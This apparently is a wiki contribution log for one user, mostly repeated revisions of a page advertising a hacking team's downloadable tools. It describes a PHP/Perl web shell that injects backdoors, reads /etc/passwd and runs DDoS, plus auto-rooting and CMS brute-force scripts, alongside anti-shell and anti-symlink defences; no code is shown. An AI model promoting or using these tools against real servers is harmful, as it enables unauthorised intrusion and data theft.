U Can Check Tutorial On [http://h4ckcity.org/forums/showthread.php?tid=415 H4ckcity.Org] 
[[File:Hackcity_Bruteforcer.zip]]
---------------------------------------
H4ckcity Antisymlink 
Authored By : Mikili 
This Script Help To Prevent Symlink In Some $Folders(/*/public_html) 
[[File:Anti_Symlink.zip]]
---------------------------------------------
Ok.
Hc (H4ckcity Security Team) Now Is Close . But We Are Always Up. And Now U Can Find Us On secure-land.net
We Have A Security & Hacking Magazine In Persian(Farsi) Lang On www.offlinemag.ir So U Can Find Us In There.
New Project Coming Soon. Be Online;). 
Offline Magazine Archive: 
[http://dl.offlinemag.ir/download/Offline1HD.rar Number1:] 
[http://dl.offlinemag.ir/download/Offline2HD.rar Number2:] 
[http://dl.offlinemag.ir/download/Offline3HD.rar Number3:] 
[http://dl.offlinemag.ir/download/Offline4HD.rar Number4:] 
[http://dl.offlinemag.ir/download/Offline5HD.rar Number5:] 
[http://dl.offlinemag.ir/download/Offline6HD.rar Number6:] 

===============
Ok . SecureLand , Hc, Offlinemag Is Going Down But We Are Alive And Working Hard On Ideas 
No News Is Good News 
2MzRp

User:2MzRp

2016-02-20T12:51:03Z

2MzRp:

== '''H4ck City Tools''' ==
H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

---------------------------------------------------

H4Ck City Anti Sheller 
Authored By: Mikili
This Script Check Server Every $second For Php Or Perl Sheller And Chmoded 000 Bad Files 
[[Image:H4ck City Anti Sheller.zip]]
-----------------------------------------------

H4ck City Auto TOols 
Authored By: Farbod Mahini 
This perl script performs a variety of auto-rooting and shell install attempts on a given host once a shell is obtained. 
[[File:H4ckcity Auto TOols.zip]]
--------------------------------------------
H4ck City Bruteforcer 
Authored By: Mehdi.H4ckCity 
This Script Help U To Bruteforcer Joomla , Wordpress , Directadmin And....
U Can Check Tutorial On [http://h4ckcity.org/forums/showthread.php?tid=415 H4ckcity.Org] 
[[File:Hackcity_Bruteforcer.zip]]
---------------------------------------
H4ckcity Antisymlink 
Authored By : Mikili 
This Script Help To Prevent Symlink In Some $Folders(/*/public_html) 
[[File:Anti_Symlink.zip]]
---------------------------------------------
Ok.
Hc (H4ckcity Security Team) Now Is Close . But We Are Always Up. And Now U Can Find Us On secure-land.net
We Have A Security & Hacking Magazine In Persian(Farsi) Lang On www.offlinemag.ir So U Can Find Us In There.
New Project Coming Soon. Be Online;). 
Offline Magazine Archive: 
[http://dl.offlinemag.ir/download/Offline1HD.rar Number1:] 
[http://dl.offlinemag.ir/download/Offline2HD.rar Number2:] 
[http://dl.offlinemag.ir/download/Offline3HD.rar Number3:] 
[http://dl.offlinemag.ir/download/Offline4HD.rar Number4:] 
[http://dl.offlinemag.ir/download/Offline5HD.rar Number5:] 
[http://dl.offlinemag.ir/download/Offline6HD.rar Number6:] 

===============
Ok . SecureLand , Hc, Offlinemag Is Going Down But We Are Alive And Working Hard On Ideas
No News Is Good News
2MzRp

User talk:2MzRp

2013-03-17T19:52:18Z

2MzRp:

Hi U Can Follow Secure-Land Security Team Jobs On www.secure-land.net
Or On My Owasp User Page

== Secure Land Security Team Logo ==
[[File:Secureland1.jpg]]

File:Secureland2.jpg

2013-03-17T19:50:09Z

2MzRp:

User talk:2MzRp

2013-03-17T19:47:35Z

2MzRp:

Hi U Can Follow Secure-Land Security Team Jobs On www.secure-land.net
Or On My Owasp User Page

== Secure Land Security Team Logo ==
[[File:Secureland1.jpg]]
 [[File:Secureland2.jpg]]

File:Secureland1.jpg

2013-03-17T19:43:43Z

2MzRp: Secure Land Security Team First Logo

Secure Land Security Team First Logo

User talk:2MzRp

2013-03-17T19:37:24Z

2MzRp:

Hi U Can Follow Secure-Land Security Team Jobs On www.secure-land.net
Or On My Owasp User Page

== Secure Land Security Team Logo ==

[[File:Secureland1.jpg]]

User talk:2MzRp

2013-03-17T19:35:53Z

2MzRp: /* Secure Land Security Team Logo */ new section

Hi U Can Follow Secure-Land Security Team Jobs On www.secure-land.net
Or On My Owasp User Page

== Secure Land Security Team Logo ==

[[File:Example.jpg]]

User talk:2MzRp

2013-03-17T19:35:06Z

2MzRp:

Hi U Can Follow Secure-Land Security Team Jobs On www.secure-land.net
Or On My Owasp User Page

User:2MzRp

2013-01-12T23:13:28Z

2MzRp:

User:2MzRp

2013-01-12T23:12:32Z

2MzRp:

User:2MzRp

2013-01-12T23:03:59Z

2MzRp:

User:2MzRp

2013-01-12T23:02:02Z

2MzRp:

User:2MzRp

2013-01-12T22:58:20Z

2MzRp:

Category:Sniffing Attacks

2012-04-19T20:15:58Z

2MzRp:

[[category:attack]]

Category:Sniffing Attacks

2012-04-19T20:15:40Z

2MzRp:

[[category:attack]]
1

User:2MzRp

2011-09-10T14:17:15Z

2MzRp:

File:Anti Symlink.zip

2011-09-10T14:14:33Z

2MzRp: prevent Symlink In Some Folders

prevent Symlink In Some Folders

User:2MzRp

2011-09-10T14:12:49Z

2MzRp:

User:2MzRp

2011-09-10T14:12:13Z

2MzRp:

User:2MzRp

2011-09-10T14:11:30Z

2MzRp:

User:2MzRp

2011-09-10T13:14:48Z

2MzRp:

File:Hackcity Bruteforcer.zip

2011-09-10T13:07:57Z

2MzRp: Brute All Portal And Panels(with Forms)

Brute All Portal And Panels(with Forms)

User:2MzRp

2011-09-10T13:06:33Z

2MzRp:

User:2MzRp

2011-09-10T13:06:09Z

2MzRp:

User:2MzRp

2011-09-10T13:05:25Z

2MzRp:

User:2MzRp

2011-09-10T13:04:26Z

2MzRp:

User:2MzRp

2011-09-10T13:03:49Z

2MzRp:

User:2MzRp

2011-09-10T13:03:06Z

2MzRp:

User:2MzRp

2011-09-10T13:01:34Z

2MzRp:

User:2MzRp

2011-09-10T13:00:30Z

2MzRp:

User:2MzRp

2011-09-10T12:59:57Z

2MzRp:

User:2MzRp

2011-09-10T12:59:08Z

2MzRp:

User:2MzRp

2011-09-10T12:58:09Z

2MzRp:

User talk:2MzRp

2011-09-10T12:30:06Z

2MzRp:

Hi U Can Follow H4ck City Jobs On www.h4ckcity.2mzrp.com
Or On My Owasp Account

User:2MzRp

2011-08-24T16:32:50Z

2MzRp:

User:2MzRp

2011-08-24T15:01:40Z

2MzRp:

User:2MzRp

2011-08-24T15:00:04Z

2MzRp:

User:2MzRp

2011-08-24T14:58:26Z

2MzRp:

== '''H4ck City Tools''' ==
: 
H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

[[Image:H4ckcity Sheller Code And Tutorial.tgz.gz]]

====== ========================================= ======

====== ========================================= ======

H4Ck City Anti Sheller 
Authored By: Mikili

[[Image:H4ck City Anti Sheller.zip]]
===========================================

H4ck City Auto TOols 
Authored By: Farbod Mahini
[[File:H4ckcity Auto TOols.zip]]

User:2MzRp

2011-08-24T14:57:08Z

2MzRp:

H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

[[Image:H4ckcity Sheller Code And Tutorial.tgz.gz]]

====== ========================================= ======

====== ========================================= ======

H4Ck City Anti Sheller 
Authored By: Mikili

[[Image:H4ck City Anti Sheller.zip]]
===========================================

H4ck City Auto TOols 
Authored By: Farbod Mahini
[[File:H4ckcity Auto TOols.zip]]

User:2MzRp

2011-08-24T14:56:33Z

2MzRp:

User:2MzRp

2011-08-24T14:55:32Z

2MzRp: